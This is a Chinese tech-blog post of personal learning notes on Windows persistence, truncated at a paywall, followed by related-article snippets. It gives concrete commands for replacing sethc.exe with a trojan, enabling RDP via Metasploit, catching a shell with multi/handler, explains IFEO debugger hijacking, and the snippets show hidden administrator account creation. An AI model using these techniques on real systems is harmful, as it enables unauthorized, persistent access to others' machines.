windows权限维持

最新推荐文章于 2024-04-15 22:08:22 发布
最新推荐文章于 2024-04-15 22:08:22 发布
阅读量1.4k 收藏 1
点赞数 2
分类专栏: 内网渗透学习记录 文章标签: windows 安全 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68210863/article/details/127588501
版权

前言:

          分享学习心得,实操笔记记录

          为了演示,存放在windows下的木马路径为c:\windows\muma.exe  

实操开始:

一:辅助功能镜像劫持。

就比如说想粘滞键这样的程序 或者放大镜这些都是windows的辅助功能,缺点就是老版本的系统比较适用,windows2012以下可以尝试

exe程序存放路径:

屏幕键盘:c:\windows\system32\osk.exe

放大镜:c:\windows\system32\Mageify.exe

粘滞键: c:\windows\system32\sethc.exe

条件是需要能连接到rdp3389端口

开启对方3389端口:run post/windows/manage/enable_rdp

 Kali远程连接:rdesktop 对方ip:3398

替换命令粘字键:copy c:\windows\muma.exe c:\windows\system32\sethc.exe

msfconsole开启use exploit/multi/handler监听

打开msf等待接收shell就ok!

二:IFEO,映像劫持

就是一种技术手段,原理类似于辅助功能镜像劫持,改的是注册表里面的东西

原理:

当我们双击运行程序的时候。系统就会查询IFEO注册表。如果发现存在完全相同的子键,就会查询对应的子键中包含的"debugger"键值名,如果这个键值名不为空的情况下 系统则会吧debugger参数指定的程序文件来作为启动的程序,当对方打开对应的软件就会运行我们的木马

最低0.47元/天 解锁文章
Yoloྀ
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Windows权限维持
谢公子的博客
05-28 2254
目录 创建隐蔽账号 进程迁移 启动目录 横向渗透 在红蓝对抗实战中,当我们获取到一台Windows主机的权限后,首先要做的就是怎么维持住该权限。因为防守方的实力也在不断增强,并且他们的流量监测设备也在不断监控,如果发现机器被植入木马,他们肯定会采取措施。 比如采取以下几点措施: 查杀木马进程 重启主机 断网 关闭主机 而对于我们维持权限,可以有以下几点: 创建隐蔽账号 如果目标主机的3389端口开放着,则我们可以创建隐蔽账号。 或者读取该主机administrator账号密码,使用
windows 权限维持
weixin_52263461的博客
01-20 244
添加影子用户 影子用户顾名思义就是一个隐藏用户,只能通过注册表查看这个用户,其它方式是找不到这个用户的信息的。在用户名后面添加$可以创建匿名的用户再添加到管理员组。 Net user看不到用户,但是在计算机管理里面还是可以看的到。 创建普通账号 net user huahua 123456 /add net localgroup administrators huahua /add (将用户加入组) 创建隐藏账户 net user huahua$ 123456 /add net user 查看
权限维持
最新发布
WX公众号-小白学安全
04-15 645
攻击者在获取服务器权限后,会通过一些技巧来隐藏自己的踪迹和后门文件,本文介绍Linux下的几种隐藏技术。本文主要介绍了Linux下的几种隐藏技术,包括隐藏文件、隐藏权限、隐藏历史操作命令、端口复用、进程隐藏等方面的技巧。仅作抛砖引玉之用,欢迎留言分享。在渗透测试中,有三个非常经典的渗透测试框架----Metasploit、Empire、Cobalt Strike。那么,通过漏洞获取到目标主机权限后,如何利用框架获得持久性权限呢?
内网渗透之windows权限维持
07-18
windows的进程查看器(dll)
Telemetry:WINDOWS TELEMETRY权限维持
03-18
本地管理员的安装权限(要求具有写入HKLM的能力) 有CompatTelRunner.exe 2008R2 / Windows 7至2019 / Windows 10 优势 使用系统自己的遥测计划任务 仅注册表可疑后门故障排除 命令行用法 ABUSING WINDOWS ...
权限维持_Windows内核_驱动断链隐藏技术1
08-03
1. 恶意驱动件查找 2. 驱动断链隐藏结构 3. 代码分析实现
046-红队之浅谈基于Windows telemetry的权限维持.pdf
09-20
"红队浅谈基于Windows telemetry的权限维持" Windows Telemetry是一种强大的监控工具,红队可以使用它来维持权限,以下是相关知识点: 一、 Windows Telemetry 简介 Windows Telemetry是Windows操作系统中的一个...
Silentsoul04#vulnerability-paper-1#权限维持Windows 内核~ 驱动断链隐藏技术1
07-25
前言在做权限维持的时候,往往采用三环的技术显得可能微不足道了。本节用内核层的技术实现驱动信息隐藏。恶意驱动文件查找在普遍的红蓝对抗中,蓝队针对于底层的知识了解的
网络安全-渗透中的权限维持-杨晓成-360
02-01
网络安全-渗透中的权限维持-杨晓成-360-下载版 权限维持 Windows相关 Linux相关 中间件 webshell
【内网安全】——Windows权限维持
Demo不是emo的博客
02-19 2859
Windows权限维持姿势汇总
Windows权限维持方法
weixin_43722879的博客
08-15 464
Windows权限维持方法
Windows 权限维持手法
qq_53742230的博客
07-20 596
Windows 权限维持手法总结
windows权限维持方法详解
good good study
01-23 3494
在获取服务器权限后,为了防止服务器管理员发现和修补漏洞而导致对服务器权限的丢失,测试人员往往需要采取一些手段来实现对目标服务器的持久化访问。 权限持久化(权限维持)技术就是包括任何可以被测试人员用来在系统重启、更改用凭据或其他可能造成访问中断的情况发生时保持对系统的访问技术。
Windows常见的几种权限维持
hackzkaq的博客
05-24 1654
零基础学黑客,搜索公众号:白帽子左一 1.映像劫持技术 简介 “映像劫持”,也被称为“IFEO”(Image File Execution Options),在WindowsNT架构的系统里,IFEO的本意是为一些在默认系统环境中运行时可能引发错误的程序执行体提供特殊的环境设定。 当一个可执行程序位于IFEO的控制中时,它的内存分配则根据该程序的参数来设定,而WindowsN T架构的系统能通过这个注册表项使用与可执行程序文件名匹配的项目作为程序载入时的控制依据,最终得以设定一个程序的堆管理机制和一些辅助
Windows 常见的权限维持方式
05-21
以下是 Windows 常见的权限维持方式: 1. 提权攻击:攻击者通过利用系统或应用程序的漏洞,获取更高的权限。 2. 横向渗透:攻击者通过已经获得的用户帐户,尝试在网络内部扩散并获取更高的权限。 3. 后门:攻击者...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值